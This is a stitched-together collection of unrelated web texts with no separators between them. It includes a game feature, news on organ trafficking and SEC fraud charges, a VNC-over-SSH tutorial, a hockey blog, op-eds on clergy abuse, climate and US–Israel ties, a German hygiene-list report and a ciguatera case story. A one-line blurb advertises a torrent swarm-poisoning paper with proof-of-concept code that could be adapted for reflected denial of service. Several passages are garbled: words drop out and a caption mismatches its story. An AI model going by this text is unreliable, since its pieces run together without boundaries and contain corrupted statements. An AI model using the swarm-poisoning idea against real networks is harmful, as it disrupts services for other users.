We 've covered it a bunch before ( in text and video ) , though its Google - proof title does n't make coverage that easy to find .
Advertisement
It 's even a Game Developers Conference tradition for me to spot the sharp Steenberg lugging his laptop through the show 's halls , happily coaxing me into another demo of the game .
I marvel at the only video game I 've ever seen that looks like it was art - designed by Claude Monet .
He races through the first - person game explaining its quasi- massively - multiplayer design and its morphing terrain , skipping any explanation of its made - up in - game language and tugging on me to look at all the advanced texturing tools he 's created or some other technology he surely knows I can't fully appreciate .
Never before , not until this month 's GDC , did I jokingly accuse Eskil of being a hippie .
He was explaining how his game works and why it does n't let players level - up .
You collect things in this first - person game .
You kill computer - controlled enemies .
But in this MMO , you gain no experience points .
You do n't level up into a character that is better than everyone else , a Level 80 World of Warcraft master that would make the WoW newcomers jealous .
Instead , any of the benefits you gain for your actions — improved character health , better weapons , new transportation options — are made accessible to anyone in your player group , anyone who is playing from the same base settlement that you started in .
G/O Media may get a commission Subscribe and Get Your First Bag Free Promo Code AtlasCoffeeDay20
What 's gained for the individual in Love , in other words , is gained for the group .
If you let a player level up their character , Eskil told me , " then people start caring about themselves . "
But if you have them build something for the community then you have something that makes people respect you and from which everyone benefits .
Advertisement
Steenberg sees this as a time - saver .
He says it helps a player who is busy with non-gaming parts of their life to still have a character who can play alongside those who devote more time to Love .
Steenberg himself thinks he will benefit from this aspect of Love gaming .
" The game is designed for me , because I do n't have a lot of time to play . "
But beyond a time - saving feature it is a matter of values .
Steenberg seems turned off by braggarts and is invigorated by the idea of people gaining acclaim for charity and upkeep for the community .
It is n't the most perfect analogy but Steenberg suggested I think of Barack Obama and why so many more people liked him when he became President than they did when they had n't heard of him two years prior .
Obama did n't physically transform when he became President of the United States , Steenberg pointed out .
He did n't level up .
" He ca n't take 50 bullets .
He can't fly .
He did n't grow two arms .
He got an achievement and people started trusting him .
He did something people respect . "
Advertisement
I think it was after Eskil Steenberg made that point that it clicked .
Making a game called Love .
Making a game full of settlements of players who share communal ownership of individual achievements .
You 're a hippie , I chided him .
He smiled .
He laughed .
He was not at all offended .
Love launches tomorrow on PC and will come to Mac and Linux if Steenberg can find people to help with that .
Get the game from the official Love site .
A retired army brigadier general is among six suspects arrested by Israeli police investigating an organ - trafficking ring , police say .
The organisation offered as much as $ 100,000 ( £ 65,600 ) for kidneys , which were transplanted by doctors in poor countries , a sting operation uncovered .
Police said they had been " shocked " by the extent of the smuggling ring .
Retired Gen Meir Zamir , arrested in connection with the trafficking , won a medal of valour in the Yom Kippur War .
' Dream come true '
The trafficking ring came to light after a 50 - year - old woman from Nazareth came to police .
We ran an undercover investigation and we were shocked by the proportions of this
Superintendent Ahron Galor
She told them she was flown to Azerbaijan where doctors removed her kidney .
On her return to Israel she was expecting to be given $ 100,000 , but she never received the money .
Another 18 - year - old man complained to police after he was offered $ 80,000 and flown to the Philippines to have the operation .
" We ran an undercover investigation and we were shocked by the proportions of this , " Police Superintendent Ahron Galor told Ynet News .
" We learned there are many people willing to sell a kidney for just £ 10,000 .
These are people who have severe financial difficulties , for whom such a sum is a dream come true . "
Forging documents
The traffickers advertised online , suggesting there was another solution for people who had been waiting for kidney transplants for years .
They offered the kidneys for sale for $ 140,000 .
As well as Gen Zamir , two lawyers were among those arrested in the sting operation .
The lawyers are suspected of forging documents which said the recipient and donor were related .
Police said members of the ring tried to cover their tracks by hiding the Israeli medical records of the donors .
This made it hard for donors to be treated if they became sick following the surgery .
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
Virtual Network Computing ( VNC ) allows you to log into a full desktop on a remote server ( as opposed to just opening windows on your local machine , as with X11 over SSH ) .
It can be very useful , and it ’s very fast to set up .
Step 1
Tip of the Trade : VNC makes it easy to log into a full desktop on a remote server .
Follow these steps , and your Debian Linux server will be up and running in no time .
I chose to use vnc4 ( there are other options , such as TightVNC ) , so the first step was the vnc4server Debian / Ubuntu package on my remote server .
Once vnc4 is installed , run it for the first time to finish setup , and set a VNC password :
vncserver :1
This starts a daemon off , rather than vnc4 running in the foreground .
You ’ll get your shell prompt back once it ’s running .
Step 2
To kill the server again , use
vncserver - kill :1
Step 3
You will probably want to edit the ~/.vnc / xstartup file to control which applications and window manager are kicked off at startup .
The default window manager is x -window - manager .
I prefer Xfce4 , which is lightweight and therefore good for running remotely .
You can also use Gnome .
To specify , comment out the x - window - manager line and add a line for your preferred session :
xfce4-session &
Step 4
Finally , it ’s better to run the session through an SSH tunnel ( rather than unencrypted on port 5901 , as by default ) .
Run this command on the client machine :
ssh -f -N -L 5901:localhost:5901 user@yourserver.co.uk
Then start your server on the remote machine :
vncserver :1
Step 5
Finally , use a VNC client ( e.g. xvnc4viewer for Linux , or Chicken of the VNC for Mac ) to connect to localhost on port 5901 ( the SSH connection is set to forward local port 5901 to remote port 5901 ) , using your VNC password .
And you ’re in !
Just remember to kill the VNC server and your ssh process once you ’re done .
Juliet Kemp has been messing around with Linux systems , for financial reward and otherwise , for about a decade .
She is also the author of “ Linux System Administration Recipes : A Problem - Solution Approach ” ( Apress , 2009 ) .
Follow ServerWatch on Twitter
This post was inspired by a fanPost by our great community member krytime .
He asked if the Lindy Ruff system was difficult to understand and that inspired me to look into it a little bit deeper .
The Buffalo Sabres have not had too much luck with trade deadline acquisitions in past years .
Many people are starting to think the acquisition of Raffi Torres will fall in the category of bust .
Torres has not scored yet in seven games played and he has missed the past two games with a mysterious upper body injury .
He was expected to add " sandpaper " to the Sabres lineup and have the potential to create some offense along the way .
He is a big bodied player that never shies away from physical play and he had 19 goals i 60 games with the Blue Jackets before the trade .
There is still time for Torres to become comfortable in the Sabres system but so far he has not developed much chemistry with his teammates .
He has spent most of his time on the third and fourth lines and that could be a factor in his lack of offensive production .
Is it playing on the third and fourth lines that has held Torres back or is it the " Lindy Ruff System " ?
The Lindy Ruff system is built on a defense first mentality and it seems it is difficult to understand .
The Sabres came out of the lockout with a system that was built on speed and offense , when Drury and Briere bolted in the same off - season that system was replaced with a system built on defense .
It took a long time for the current players to buy into the system , ( see missing the playoffs the last two seasons ) .
If it took the players who have already been here for a couple of seasons to understand it , why should we expect new players to understand it ?
This season it is Torres that seems to have regressed , last season it was Dominic Moore who disappeared in a Sabres uniform and a couple of seasons ago Dainius Zubrus seen his offensive numbers crumble to almost nothing .
The one player that seemed to do okay in recent seasons was Steve Bernier but even he fell off after a fast start .
2010 GP G A P +/- PIM PPG SHG GWG GTG SOG PCT Columbus - Raffi Torres 60 19 12 31 - 8 32 7 0 3 0 99 19.0 Buffalo - Raffi Torres 7 0 2 2 -2 0 0 0 0 0 10 0.0
2009 GP G A P +/- PIM PPG SHG GWG GTG SOG PCT Maple Leafs - Dominic Moore 63 12 29 41 - 1 69 4 1 1 0 132 9.1 Buffalo - Dominic Moore 18 1 3 4 -1 23 0 0 0 0 33 3.0
2006 GP G A P +/- PIM PPG SHG GWG GTG SOG PCT Capitals - Dainius Zubrus 60 20 32 52 - 16 50 9 0 4 0 127 15.7 Buffalo - Dainius Zubrus 19 4 4 8 - 3 12 1 0 0 0 31 12.9
The numbers above clearly show the Sabres have had very little success with deadline acquisitions .
Should we blame Darcy Regier for bringing in the wrong players or does the blame go to Lindy Ruff for making goos players look invisible ?
Sabres fans are always quick to defend Lindy Ruff but sometimes we have to take the good with the bad .
Ruff is a good coach that builds teams that are made to win in the playoffs but his system is difficult and takes some time to understand .
The original question was whether or not the Lindy Ruff system was difficult to understand and the answer is yes .
It is either difficult to understand or difficult to buy in to .
Raffi Torres will not put up the offensive numbers he did in Columbus but if he decides to buy into the system , his physical play will be a welcome addition over Clarke MacArthur in the playoffs .
Let 's not judge Torres by his offensive numbers but instead by his on ice contribution .
Remember that Zubrus was brought here to help the offense but instead a he was a key defensive forward in the playoffs .
He bought into the Lindy Ruff system , lets hope Torres does the same .
SEC Charges Goldman Sachs With Fraud in Structuring and Marketing of CDO Tied to Subprime Mortgages
FOR IMMEDIATE RELEASE
2010 - 59
Washington , D.C. , April 16 , 2010 — The Securities and Exchange Commission today charged Goldman , Sachs & Co. and one of its vice presidents for defrauding investors by misstating and omitting key facts about a financial product tied to subprime mortgages as the U.S. housing market was beginning to falter .
The SEC alleges that Goldman Sachs structured and marketed a synthetic collateralized debt obligation ( CDO ) that hinged on the performance of subprime residential mortgage - backed securities ( RMBS ) .
Goldman Sachs failed to disclose to investors vital information about the CDO , in particular the role that a major hedge fund played in the portfolio selection process and the fact that the hedge fund had taken a short position against the CDO .
" The product was new and complex but the deception and conflicts are old and simple , " said Robert Khuzami , Director of the Division of Enforcement .
" Goldman wrongly permitted a client that was betting against the mortgage market to heavily influence which mortgage securities to include in an investment portfolio , while telling other investors that the securities were selected by an independent , objective third party . "
Kenneth Lench , Chief of the SEC's Structured and New Products Unit , added , " The SEC continues to investigate the practices of investment banks and others involved in the securitization of complex financial products tied to the U.S. housing market as it was beginning to show signs of distress . "
The SEC alleges that one of the world 's largest hedge funds , Paulson & Co. , paid Goldman Sachs to structure a transaction in which Paulson & Co. could take short positions against mortgage securities chosen by Paulson & Co. based on a belief that the securities would experience credit events .
According to the SEC 's complaint , filed in U.S. District Court for the Southern District of New York , the marketing materials for the CDO known as ABACUS 2007 - AC1 ( ABACUS ) all represented that the RMBS portfolio underlying the CDO was selected by ACA Management LLC ( ACA ) , a third party with expertise in analyzing credit risk in RMBS .
The SEC alleges that undisclosed in the marketing materials and unbeknownst to investors , the Paulson & Co. hedge fund , which was poised to benefit if the RMBS defaulted , played a significant role in selecting which RMBS should make up the portfolio .
The SEC 's complaint alleges that after participating in the portfolio selection , Paulson & Co. effectively shorted the RMBS portfolio it helped select by entering into credit default swaps ( CDS ) with Goldman Sachs to buy protection on specific layers of the ABACUS capital structure .
Given that financial short interest , Paulson & Co. had an economic incentive to select RMBS that it expected to experience credit events in the near future .
Goldman Sachs did not disclose Paulson & Co. 's short position or its role in the collateral selection process in the term sheet , flip book , offering memorandum , or other marketing materials provided to investors .
The SEC alleges that Goldman Sachs Vice President Fabrice Tourre was principally responsible for ABACUS 2007 - AC1 .
Tourre structured the transaction , prepared the marketing materials , and communicated directly with investors .
Tourre allegedly knew of Paulson & Co. 's undisclosed short interest and role in the collateral selection process .
In addition , he misled ACA into believing that Paulson & Co. invested approximately $ 200 million in the equity of ABACUS , indicating that Paulson & Co. 's interests in the collateral selection process were closely aligned with ACA 's interests .
In reality , however , their interests were sharply conflicting .
According to the SEC 's complaint , the deal closed on April 26 , 2007 , and Paulson & Co. paid Goldman Sachs approximately $ 15 million for structuring and marketing ABACUS .
By Oct. 24 , 2007 , 83 percent of the RMBS in the ABACUS portfolio had been downgraded and 17 percent were on negative watch .
By Jan. 29 , 2008 , 99 percent of the portfolio had been downgraded .
Investors in the liabilities of ABACUS are alleged to have lost more than $ 1 billion .
The SEC 's complaint charges Goldman Sachs and Tourre with violations of Section 17 ( a ) of the Securities Act of 1933 , Section 10 ( b ) of the Securities Exchange Act of 1934 , and Exchange Act Rule 10 b - 5 .
The Commission seeks injunctive relief , disgorgement of profits , prejudgment interest , and financial penalties .
# # #
For more information about this enforcement action , contact :
Lorin L. Reisner
Deputy Director , SEC Enforcement Division
( 202 ) 551-4787
Kenneth R. Lench
Chief , Structured and New Products Unit , SEC Enforcement Division
( 202 ) 551-4938
Reid A. Muoio
Deputy Chief , Structured and New Products Unit , SEC Enforcement Division
( 202 ) 551-4488
There are a lot more myths than facts bantered around about clergy in the Catholic Church .
Here are six important points that you should know if you are interested in this topic .
1. Catholic clergy are n't more likely to abuse children than other clergy or men in general .
According to the best available data ( which is pretty good , coming from a comprehensive report by the John Jay College of Criminal Justice in 2004 , as well as several other studies ) , 4 percent of Catholic priests in the U.S. sexually victimized minors during the past half century .
No evidence has been published at this time which states this number is higher than clergy from other religious traditions .
The 4 percent figure appears lower than school teachers during the same time frame , and certainly less than offenders in the general population of men .
Research states that over 20 percent of American women and about 15 percent of American men were sexually violated by an adult when they were children .
Sexual victimization is tragically fairly common in the general population , but luckily these numbers have been dropping in recent years .
2. Clergy sexual abuse in the Catholic Church can't be blamed on celibacy .
Not having does n't make children the object of one 's desire .
First , if Catholic clergy are n't more likely to be sex offenders than other clergy or men in general , then celibacy can't be blamed by itself .
Most sex offenders are not celibate clergy .
Most are married or partnered .
Furthermore , many men who do n't have sex for a variety of reasons ( e. . , no suitable partners or marital or relationship distress ) do n't turn to children for sexual gratification .
They turn to other consenting adults .
Think about it :
If you do n't have sex , who becomes the object of your desire ?
Children or other adults ?
3. Clergy sexual abuse in the Catholic Church can't be blamed on homosexuality .
Although the vast majority of victims are boys ( 80 percent , according to the 2004 John Jay study and other studies ) , and the Catholic Church has a large number of priests who are homosexual in orientation ( 22 - 45 percent , according to a variety of studies and reports ) , homosexuality does n't make men sex offenders .
No evidence exists that suggest , in and of itself , makes someone at risk to commit sex crimes against children or others .
Sexual orientation is not a risk factor for .
4. Clergy sexual abuse in the Catholic Church can't be blamed on an all - male clergy .
If Catholic clergy are n't more likely to be sex offenders than clergy from other traditions , then an all - male clergy can't be blamed .
Having women clergy does n't stop sex offenders from offending .
5 . Almost all of clergy sexual abuse cases in the Catholic Church that we hear about in the news are from decades ago ( usually the 1960s and 70s ) .
Although these stories are horrific to hear , they are almost never about incidents that have occurred since the late 1980s .
Incidents of abuse in the past 20 to 25 years are quite rare compared to incidents during the 60s and 70s .
This is also true for other groups , such as school teachers .
Incidents since the 2002 crisis in the U.S. unfolded are especially rare .
Most of the more recent cases are from international priests , who were both born and formed ( i.e. , trained and ordained ) overseas , and who generally did n't go through the screening and training process that local men go through .
Some argue that more recent victims ( i.e. , since the mid 1980s ) just have n't come forward yet .
Perhaps that is true , but thus far , no published data supports this theory .
6 . Most clergy sex offenders are n't .
Research tells us that about 80 percent of clergy sex offenders abuse post - pubescent teens , not pre-pubescent children .
So the phrase " pedophile priest " is a misnomer .
You might say that it does n't matter .
Both categories involve victimizing minors .
True , but the risk factor profiles , as well as the evaluation and treatment prognoses , are very different between the two groups .
Besides , while people may be worried about young children being victimized , they may neglect the more likely victim : the .
Perhaps the real issue here is that many are outraged with church leaders ( especially bishops ) , whom they believe have been defensive and arrogant .
People demand responsibility and accountability , and they do n't see it happening .
Clearly , some church leaders treated victims and their families very poorly .
For many rank - and - file Catholics , who often put priests on pedestals , it is shocking to hear that some of these men have sexually violated anyone , let alone children .
The Catholic Church 's unpopular positions on sexual ( e.g. , , contraception , homosexuality , ) make sex crimes committed by priests even more scandalous .
The secrecy and otherworldliness of the Catholic Church also make the story of committed by priests of great interest to the media and to the general population .
It all sounds like a Dan Brown novel !
Finally , many of the 25 percent of Americans who are Catholic had ambivalent feelings about their church to begin with , even before the clergy abuse crisis unfolded .
Many who were raised in the church during previous generations have deeply emotional stories of priests and nuns who had impossibly high standards for thought and behavior , which makes stories of clergy sexually violating children so hypocritical .
Perhaps the gospel verse " He who is without sin may cast the first stone " from John 8:7 sums up this sentiment .
Let me be very clear :
The sexual victimization of children by priests ( or by anyone for that matter ) is inexcusable .
Church officials protecting offenders rather than victims is also inexcusable .
There is much to be angry about .
Many get even more upset when accountability and responsibility in the church does n't seem to occur .
Many reasonable and thoughtful people argue that the Catholic Church should allow married men , women , and those who are homosexual to be ordained as priests and deacons ( as the Episcopalians do ) to prevent clergy abuse from occurring .
But the current data on clergy abuse just does n't seem to support these arguments .
Perhaps future data will change current findings , but one has to go with the best available data to inform one 's thinking now .
The recent clergy abuse stories coming out of Europe and South America are not surprising , but we have to be rational , letting good data and logic inform us , rather than relying on myths , , and hysteria .
If someone ( or some group ) has empirical data that can contradict the six points mentioned above , please present it , and let it be subjected to academic peer review .
We all may have particular beliefs and perspectives about the causes , contexts , nature , and scope of clergy sexual abuse in the Catholic Church , but we should be informed by empirical quality data and reason .
For more information , you might review my 2004 book , Sin against the Innocents : Sexual Abuse by Priests and the Role of the Catholic Church , and my 1999 book , Bless Me Father For I Have Sinned : Perspectives on Sexual Abuse Committed by Roman Catholic Priests .
Additionally , you might take a look at the John Jay Study referred to earlier , which can be accessed from the U.S. Council of Catholic Bishops web site : http://www.usccb.org/nrb/johnjaystudy/.
A quick 2018 update ....
Since this article was written and published in 2010 several additional resources have become available including the John Jay College of Criminal Justice 's Causes and Context Study published in 2011 as well as another book about the problem , Sexual Abuse in the Catholic Church : A Decade of Crisis , 2002 - 2012 , published by my team in 2012 .
Interested readers may wish to review them .
Utilize advanced app capabilities .
Get access to cutting - edge Apple technologies that help you create useful and engaging user experiences .
Integrate with Siri to let users can get things done using just their voice , use Apple Pay to sell a variety of items directly from within your app , enable your apps to store app data in iCloud , and much more .
click to enlarge FILE PHOTO
he clear scientific evidence that man-induced climate change could have profound and perhaps disastrous consequences is being denied by economic and political forces .
In the U.S. , those with the most to lose , such as the coal and oil industries , are funding efforts to discredit the scientific basis for climate change concerns .
Science is not a take - it - or - leave - it proposition .
Gravity , light , and other forces act with or without agreement about the science of how they operate .
The scientific knowledge of how gases can insulate a planet ’s surface has been understood for longer than a century .
In 1824 , the brilliant mathematician Joseph Fourier postulated the ability of atmospheric gases to act as an insulator for a planet .
In 1896 , Svante Arrhenius , a Nobel laureate , developed the equations that are used to calculate the insulating effect of various gases .
The Intergovernmental Panel on Climate Change ( IPCC ) has researched and reported on Earth ’s warming since the late 1980s .
IPCC reports are a consensus of current knowledge from more than 600 eminent scientists .
IPCC has produced four formal reports and was awarded the Nobel Peace Prize in 2007 for this work .
( Read these reports on the Internet ) .
Water vapor and carbon dioxide ( CO2 ) are the primary greenhouse gases .
Global water vapor is relatively constant , but atmospheric CO 2 has increased from about 280 ppm in 1750 to 389 ppm today ( June 2009 ; see Swanson , CO2Now.org ) .
Atmospheric CO2 levels are now higher than at any time in the last 800,000 years .
This rapid buildup caused by widespread use of fossil fuels is responsible for approximately 90 percent of human - caused planetary warming .
Other activities , such as the human deforestation of about half the planet , have reduced natural CO 2 absorption while releasing methane , another powerful greenhouse gas .
For the last 10,000 years various terrestrial and marine systems have kept the Earth ’s average temperature and precipitation in a narrow range .
This stable climate allowed the development of agriculture and increased human population .
The scientific discovery of microbes led to public health and medical advances , which , along with improved agriculture , has allowed human population to increase from about 1.2 billion in 1850 to about 6.9 billion today .
As the world modernizes , the primary driver of atmospheric CO 2 increase is fossil fuel combustion .
Burning fossil fuels ( coal , oil , natural gas ) releases into the atmosphere carbon that was buried in the Earth millenia ago .
Atmospheric levels of methane and nitrous oxide are also increasing from human activities ( for example , applying chemical fertilizers ) .
The CIA Fact Book estimates world population growth at 220,980 people every day in 2009 .
The CIA forecasts human population increasing to nine billion in the next three to four decades .
Clearly , nature is under strain to absorb all these people and their fossil fuel combustion , and something will inevitably give .
Is climate change already happening ?
According to the Pew Center , “ Over the past 50 years , the [ worldwide ] data on extreme temperatures have shown similar trends of rising temperatures : cold days , cold nights , and frosts occurred less frequently over time , while hot days , hot nights , and heat waves occurred more frequently . ”
This is now causing sea - level rise , mountain glaciers to disappear , and rapid change in ocean currents , such as the Gulf Stream .
The ocean has also become about 30 percent more acidic as it absorbs CO 2 from the atmosphere ( US EPA ) .
Australia now experiences what is ahead for much of the world .
“ Drought , fires , killer heat waves , wildlife extinction and mosquito - borne illness — the things that climate change models are predicting — have already arrived , ” say Australian scientists ( Los Angeles Times 2008 ) .
Deserts across Asia , Africa , and the Indian sub - continent are also expanding substantially , causing dislocation and contributing to civil wars ( e. g. , Sudan ) .
U.S. military planners are taking the threat of climate change very seriously .
The think tank CNA is a nonpartisan research organization that operates the Center for Naval Analyses and the Institute for Public Research .
A recent CNA report reviewed how likely climate change impacts might affect US military commitments ( and taxpayer expenses , I might add ) .
In the report summary , retired Admiral T. Joseph Lopez , who commanded peacekeeping forces in Bosnia , said , “ The impacts of climate change will be huge — deserts move north , coastal areas threatened , the dislocation of people .
I ’m a student of instability , and instability is the enemy .
It helps religious extremists and terrorists , ” ( Seattle Times , 2008 ) .
The CNA report concludes , “ We will pay for this one way or another .
We will pay to reduce greenhouse gas emissions today , and we ’ll have to take an economic hit of some kind .
Or , we will pay the price later in military terms .
And that will involve human lives .
There will be a human toll . ” — Gen Zinni .
The science is clear and the time for talk is running out .
We cannot continue using the atmosphere as a sewer without substantial human and financial costs , and perhaps drastic and irreversible consequences .
Dave Morrow is a local atmospheric scientist with more than 30 years experience in the field .
He has worked for the U.S. EPA , state and local government agencies , and private clients including the American Petroleum Institute .
His most notable achievement is educating Caltrans about automated vehicle identification , that is now used to pay tolls on all Bay Area bridges , with resultant congestion and air emission reductions .
Send comments via the editor at econnolly@newtimesslo.com .
US President Barack Obama is pro-Israel , even though he does not shower Israel with love on a daily basis , as was the case during 16 years of pampering under Clinton and Bush .
In addition , the president does not mutter at every opportunity how deep America ’s commitment is to Israel ’s security and qualitative advantage ; yet when it comes to all the parameters that count , Obama is pro-Israel .
The American president stood up at Cairo University and declared that the alliance with Israel is unshakeable .
Moreover , before criticizing him for his “ humiliating ” attitude to Prime Minister Netanyahu , we should note that Obama maintains no warm personal ties with any foreign leader , including the French president , the British PM , the German chancellor , and even America ’s neighbors , the Mexican president or the Canadian PM .
US - Israel Crisis PM : Remarks about Obama inappropriate Roni Sofer Netanyahu slams media coverage of crisis with Washington , says ' these are disagreements among friends , based on longtime relationship , tradition '
PM : Remarks about Obama inappropriate
Obama pledged to pull many of the US forces out of Iraq by August , he continues the war against al - Qaeda and its satellites and “ franchisees , ” and he attempts to formulate effective policy to counter Iran ’s nuclear efforts .
Hence , the US has an interest in seeing a strong Israel that would constitute part of the deterrence vis-à - vis the radical and violent bloc in the Arab - Iranian theater .
In light of the above , the criticism leveled at Israel by General Petraeus and again this past week by Secretary of Defense Gates is incisive :
The absence of an Israeli - Palestinian agreement , or at the very least a robust and ongoing diplomatic process pose challenges and produce problems in promoting America ’s interests in the Middle East .
Reasonable price to pay
If we wish to sum up the criticism , Israel is turning from an asset to a burden .
We do not have a Soviet Union here and a balance of power involving a superpower and a client state .
We only have the US , allies such as Israel and Saudi Arabia , and an Iranian threat .
In the view of many members of the establishment in Washington , Israel is not helping the US , and hence is not helping itself .
After all , Israel ’s national interest is to maintain the alliance and special relationship with the US .
This is Israel ’s greatest strategic asset and most amazing diplomatic achievement throughout its 62 years of independence .
To a large extent , America ’s commitment to Israel is incommensurate with its regional interests , yet nonetheless , our relationship developed into what it is .
Hence , Israel has an interest in a strong US , because a powerful America and a stable special relationship imply a strong Israel , clearly boosting our power and deterrence .
The price required of Israel is not genuinely high and does not undermine its vital interests .
Beyond the dourness and cool reception accorded to Netanyahu by Obama , we should note that the Administration ’s demands of Israel are not new and do not constitute a radical change in policy ; rather , they constitute a repetition – which is certainly more incisive and unequivocal – of demands presented by previous Administrations .
Those who claim this is a policy change absolve themselves of responsibility for failing to comprehend the Obama Administration .
Everything , and this includes everything , had been said in the weeks that passed between Obama ’s swore - in ceremony and the general elections in Israel early in 2009 .
Netanyahu ’s survival in power , preservation of the current coalition , and ongoing construction in the settlements located outside the three large blocs and east of the security fence are legitimate interests for Netanyahu himself , yet it would be difficult to characterize them as vital interests for the State of Israel ; it ’s even more difficult to convince us that these interests justify a rift vis -à - vis the US .
There is no need to resort to doomsday scenarios in respect to our ties with the US ; such scenarios are unlikely to materialize .
It ’s enough that the Arab world and Europeans are watching Netanyahu ’s visit to Washington and that Israel ’s isolation will grow .
There is no point in constantly analyzing the “ implications of the crisis , ” as millions of words had been devoted to the topic by no .
There is also no point in again criticizing Netanyahu over the year that had been wasted without an Israeli initiative and about the tainted relationship .
The same is true for stating that this is an especially volatile conflict as it combines fundamental gaps between Israel and the US as mutual mistrust .
This statement does not constitute an answer for the following question :
What do we do next ?
At the end of the day , there two strategic Israeli interests are overwhelming here : Firstly , preserving the alliance with the US while undertaking adjustments that would reflect an understanding of US interests ; secondly , a diplomatic process vis-à - vis the Palestinians , regardless of whether it is painted in hawkish or dovish colors .
This is the agenda and that ’s the president in power - and he ’s pro-Israel in his “ realist ” approach .
Alon Pinkas , Israel ’s former consul general in New York
Armoires and accents San Antonio will be a very good place to visit when you are looking for the best accent armoires for home .
Why you should have the accent armoire at home ?
There are some considerations which lead many people to have this beautiful home furniture .
Firstly , just because this will be nice to give accent , then set you …
Paper on poisoning a torrent 's peer swarm with large numbers of fake peers , including proof of concept code .
Works on most trackers .
Could possibly be adapted to perform a reflected denial of service ( DRDoS ) on a target .
Ekelliste in allen Bezirken : Ganz Berlin packt der Ekel
Seit einem Jahr veröffentlicht Pankow die Namen verdreckter Restaurants , Cafés und Imbisse im Internet .
Jetzt wollen auch die anderen elf Bezirke Ekellisten einführen .
Die Pankower Ekelliste wird ausgeweitet : Auch die anderen elf Berliner Bezirke wollen künftig Restaurants , Imbisse und die Küchen sozialer Einrichtungen kontrollieren und die Ergebnisse danach im Internet veröffentlichen .
Kommende
Woche soll dies bei einem Treffen der Stadträdte für Ordnungsaufgaben beschlossen werden , sagte Oliver Schworck ( SPD ) , Stadtrat für Ordnungsaufgaben in Tempelhof - Schöneberg , der taz .
" Alle Bezirke scheinen eine einheitliche Regelung für Berlin zu wollen " , freut sich Schworck .
Alle Einrichtungen , die mit Lebensmitteln arbeiten , werden in regelmäßigen Abständen von den Bezirksämtern unter anderem auf Hygienestandards geprüft .
Vor einem
Jahr hatte der Bezirk Pankow aber erstmals eine für alle zugängliche Liste ins Internet gestellt , auf der Hygienemängel und Verstöße gegen Lebensmittel - und Bauvorschriften in gastronomischen Einrichtungen verzeichnet waren - samt Namen und Adressen .
Auch Fotos , die die teils sehr unappetitlichen Mängel dokumentieren , wurden wenig später auf der Seite veröffentlicht .
Die bundesweit erste Aktion dieser
Art hatte zu einer umfassenden Debatte geführt .
Kritiker warfen dem Bezirk vor , dass auf diese Art Restaurants und Imbisse bloßgestellt würden .
" Die Kritik an der Aktion ist an dem Tag verstummt , an dem wir die Küchenfotos ins Netz gestellt haben " , berichtet Jens - Holger Kirchner ( Grüne ) , Bezirksstadtrat und Leiter der Abteilung Öffentliche Ordnung in Pankow .
Kirchner hatte die Aktion initiiert .
Die Einjahresbilanz ist erschreckend .
Laut dem Bezirksamt wurden 8.675 Betriebe untersucht , bei 4.688 entdeckten die Prüfer Mängel .
Teilweise fanden sich verschimmelte Nahrungsmittel , oder diese wurden zu warm gelagert , teilweise fehlten Toiletten , oft waren Küchen stark verschmutzt .
Als schmuddelig erwiesen sich nicht nur Restaurants und Cafés , sondern mehrfach auch Kindergärten und Senioreneinrichtungen .
71 Läden und Restaurants mussten laut Kirchner sofort nach der Prüfung geschlossen werden , da die Mängel entweder zu umfassend waren oder zum wiederholten Mal auftraten .
Laut Kirchner hat bisher kein Gastronom gegen die Veröffentlichung seines Namens auf der Liste geklagt .
Um nicht nur Negativbeispiele zu veröffentlichen , gibt es im Bezirk Pankow zudem ein Smiley - System , welches besonders saubere Einrichtungen auszeichnet ( Text hier ) .
Schon im vergangenen Jahr hatten Gesundheitspolitiker gefordert , die Liste auf ganz Berlin auszuweiten .
Bei einer Umfrage der Gesundheitsverwaltung des Senats Ende 2009 votierten 78 Prozent der befragten BerlinerInnen für eine Veröffentlichung der Tests .
Und auch Gesundheitssenatorin Katrin Lompscher ( Linkspartei ) spricht sich dafür aus .
Doch nicht alle Bezirke waren bisher überzeugt .
Marzahn - Hellersdorf zum Beispiel etwa wollte keine Kritik an Geschäften veröffentlichen und lediglich positive Beispiele hervorheben .
Anstelle des Pankower Smiley - Aufklebers erhält man in dem Bezirk einen " Berliner Bären " als sichtbare Auszeichnung .
Der Bewertungsbogen unterscheidet sich jedoch kaum von der Version aus Pankow .
Jetzt ist die Zeit offenbar reif für ein gemeinsames Vorgehen der Bezirke nach dem Pankower Modell .
Bezirksstadträte von Charlottenburg - Wilmersdorf , Tempelhof - Schöneberg und auch Marzahn - Hellersdorf haben der taz gegenüber zugesagt , sich für das Projekt auszusprechen .
Stadtrat Oliver Schworck erklärte zudem , er habe noch von keinem Bezirk gehört , der dagegen sei .
" Die Negativliste ist sinnvoll " , betont der Bezirksstadtrat von Charlottenburg - Wilmersdorf , Marc Schulte ( SPD ) .
" Die öffentliche Wirkung erzeugt einen größeren Druck als Bußgelder . "
Am Freitag nächster Woche soll bei einer Versammlung der Bezirksstadträte eine einheitliche Regelung für Berlin gefunden werden .
Dabei soll auch geklärt werden , wann eine beanstandete Einrichtung von der Liste wieder gestrichen wird .
Dr. Ma was taking notes as the patient told his story , but when he mentioned this strange reversal of hot and cold , the doctor gasped .
“ I know what this is ! ” he shouted , interrupting the patient ’s story .
“ I know what this is ! ”
And with that he ran down the crowded hallway to where the attending physician and senior resident were sitting .
“ He does n’t need a head CT !
He has ciguatera poisoning . ”
Image Contaminated seafood is a common cause of Hepatitis .
Credit ... Dan Winters
Ciguatera poisoning comes from eating fish that has been contaminated with a toxin produced by an organism that grows on reef algae in some infested tropical waters .
Because the toxin is stored in fat , its concentration increases as it moves up the food chain from the little fish who eat the tainted algae to the larger , predatory fish , like shark , snapper , grouper and barracuda , and from there to the human consumer .
Unlike most other causes of food poisoning , this toxin is colorless and odorless and is n’t destroyed by cooking .
The illness was first described in 1774 by a surgeon ’s mate on the crew of Captain Cook ’s South Pacific exploration aboard the HMS Resolution .
The crewman , John Anderson , documented the symptoms described by several shipmates who had eaten a large fish caught in the tropical waters .
There was “ a flushing heat and violent pains in the face and head , with a giddiness and increase in weakness ; also a pain , or as they expressed it , a burning heat in the mouth and throat . ”
Many since then have described the rapid onset of nausea , vomiting and diarrhea — similar to other types of food poisoning — but followed by the kind of strange neurological symptoms this patient had .
Alterations in sensation — like the numbness , tingling and the bizarre hot - cold reversal — are most common and most characteristic .
The toxin can sometimes affect the heart ­— causing it to beat too slowly or irregularly .
It is rarely fatal , but there is no effective treatment , and the symptoms can persist for weeks , sometimes months , occasionally years .
It was a great diagnosis , the senior doctor told Dr. Ma .
